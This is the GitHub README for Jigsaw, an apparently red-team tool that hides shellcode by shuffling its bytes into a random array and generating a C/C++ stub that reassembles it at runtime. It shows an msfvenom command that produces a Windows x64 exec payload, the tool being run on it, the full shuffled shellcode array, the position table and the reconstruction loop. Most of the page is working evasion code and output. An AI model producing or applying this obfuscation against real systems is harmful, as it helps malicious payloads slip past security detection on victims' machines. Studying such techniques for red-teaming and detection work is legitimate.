Skip to content

Hide shellcode by shuffling bytes into a random array and reconstruct at runtime

Notifications You must be signed in to change notification settings

RedSiege/Jigsaw

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 

Repository files navigation

Jigsaw

Jigsaw takes a raw shellcode input and outputs randomized shellcode, a lookup table, and a C/C++ stub to translate the randomized shellcode back to a usable format.

Read the Red Siege blog post explaining Jigsaw: https://redsiege.com/blog/2024/03/jigsaw/

Usage

python3 jigsaw.py inputfile.bin

Example

$ msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o calc.bin
$ python3 jigsaw.py calc.bin
$ cat jigsaw.txt
unsigned char jigsaw[276] = {0x5d, 0x8b, 0x8d, 0xc0, 0x01, 0x48, 0x80, 0x00, 0x87, 0x7c, 0xc0, 0x74, 0x48, 0x58, 0xd1, 0x95, 0x00, 0xe9, 0xbd, 0x63, 0xe0, 0x01, 0x65, 0x01, 0x4a, 0x48, 0x6f, 0x44, 0x6a, 0xa2, 0x0a, 0x4c, 0xb7, 0x88, 0x5a, 0x01, 0xbb, 0xac, 0x0d, 0xba, 0x4d, 0x41, 0x59, 0x42, 0x49, 0x50, 0x5e, 0xbb, 0x5a, 0x41, 0x83, 0xc9, 0x28, 0x20, 0x00, 0x52, 0x00, 0xd2, 0x24, 0x41, 0x4a, 0x01, 0xff, 0xd0, 0xff, 0x56, 0x20, 0x31, 0x56, 0x8b, 0x6c, 0x31, 0x12, 0xf0, 0x34, 0x48, 0xac, 0x41, 0x8b, 0x01, 0x58, 0x48, 0x48, 0x04, 0x88, 0x48, 0xff, 0x52, 0x05, 0x65, 0xc9, 0xc1, 0x48, 0x8b, 0x75, 0x40, 0xd0, 0x59, 0x4d, 0xff, 0x61, 0x1c, 0x75, 0x4c, 0x01, 0x52, 0x8b, 0xc9, 0x56, 0x8b, 0x0c, 0x48, 0x58, 0xf1, 0x41, 0x31, 0x00, 0xd0, 0xd0, 0xec, 0x00, 0x59, 0x13, 0xe0, 0x72, 0x8b, 0x48, 0xff, 0x40, 0xd0, 0x00, 0x02, 0x75, 0x85, 0x20, 0x80, 0xc4, 0x58, 0x48, 0xd6, 0xd8, 0x47, 0x41, 0x59, 0x48, 0x01, 0xa6, 0xda, 0x8b, 0x41, 0xc1, 0x00, 0xc1, 0x48, 0xff, 0x52, 0x00, 0xfc, 0x51, 0x3c, 0x8b, 0x57, 0xe2, 0x2c, 0x0d, 0x01, 0xed, 0x31, 0x58, 0x7c, 0xd5, 0x01, 0x41, 0x00, 0x3c, 0x45, 0x51, 0x01, 0x08, 0x41, 0x49, 0x65, 0x00, 0x44, 0x52, 0xd0, 0x48, 0x52, 0x00, 0x5a, 0x8b, 0x3c, 0xe8, 0xe3, 0x48, 0x40, 0x8d, 0xba, 0x31, 0x44, 0x01, 0xfb, 0xf0, 0x48, 0x83, 0x51, 0x2e, 0x8b, 0x00, 0x83, 0x48, 0x61, 0x00, 0x66, 0x88, 0x00, 0x41, 0x41, 0xd5, 0x06, 0x41, 0xe4, 0x52, 0x38, 0x60, 0x20, 0x6f, 0xc0, 0x48, 0x49, 0x41, 0x20, 0x63, 0xc0, 0x72, 0xc1, 0x8b, 0x39, 0xc9, 0xba, 0x78, 0x8b, 0x41, 0x8b, 0x41, 0x00, 0xff, 0x8b, 0x89, 0x48, 0x00, 0x31, 0xff, 0x41, 0x41, 0x50, 0xb5, 0x03, 0x48, 0x41, 0x18, 0x67, 0x48, 0x41, 0x50, 0x0f, 0x8b, 0x48, 0xe0, 0xd5, 0x24, 0x18, 0xc9, 0x9d, 0x48, 0x41 };

int positions[276] = { 202, 22, 214, 6, 126, 104, 249, 81, 225, 51, 119, 86, 182, 142, 139, 236, 208, 197, 237, 267, 251, 89, 272, 217, 41, 83, 258, 95, 259, 231, 248, 132, 39, 110, 193, 148, 228, 48, 124, 234, 42, 107, 179, 72, 99, 91, 173, 254, 175, 121, 242, 116, 244, 70, 211, 23, 8, 19, 146, 169, 40, 167, 226, 168, 201, 103, 54, 222, 232, 96, 269, 18, 196, 229, 109, 29, 120, 55, 163, 100, 172, 25, 1, 164, 79, 33, 105, 27, 253, 20, 44, 122, 241, 223, 140, 157, 90, 261, 114, 199, 268, 158, 252, 134, 112, 187, 34, 57, 16, 108, 153, 194, 170, 131, 262, 115, 209, 149, 161, 184, 82, 174, 256, 129, 35, 156, 111, 188, 145, 76, 275, 52, 130, 84, 185, 78, 243, 177, 21, 113, 141, 255, 176, 192, 154, 216, 235, 264, 92, 191, 127, 260, 56, 88, 265, 69, 219, 0, 66, 49, 77, 198, 62, 53, 58, 205, 63, 46, 190, 247, 227, 160, 233, 206, 245, 137, 15, 75, 136, 151, 147, 274, 212, 155, 64, 101, 37, 14, 218, 181, 68, 73, 5, 102, 203, 97, 215, 204, 118, 143, 60, 250, 4, 67, 183, 11, 271, 71, 9, 2, 74, 50, 7, 150, 165, 207, 65, 10, 266, 246, 171, 3, 31, 128, 24, 32, 224, 47, 45, 159, 162, 98, 270, 85, 257, 61, 195, 138, 106, 221, 273, 30, 180, 152, 125, 210, 239, 26, 263, 117, 80, 43, 200, 220, 178, 36, 230, 133, 17, 186, 94, 87, 93, 12, 13, 38, 144, 166, 189, 240, 135, 28, 123, 238, 213, 59 };


unsigned int calc_len = 276;
char calc_payload[276] = { 0x00 };
int position;

// Reconstruct the payload
for (int idx = 0; idx < sizeof(positions) / sizeof(positions[0]); idx++) {
        position = positions[idx];
        calc_payload[position] = jigsaw[idx];
}

About

Hide shellcode by shuffling bytes into a random array and reconstruct at runtime

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages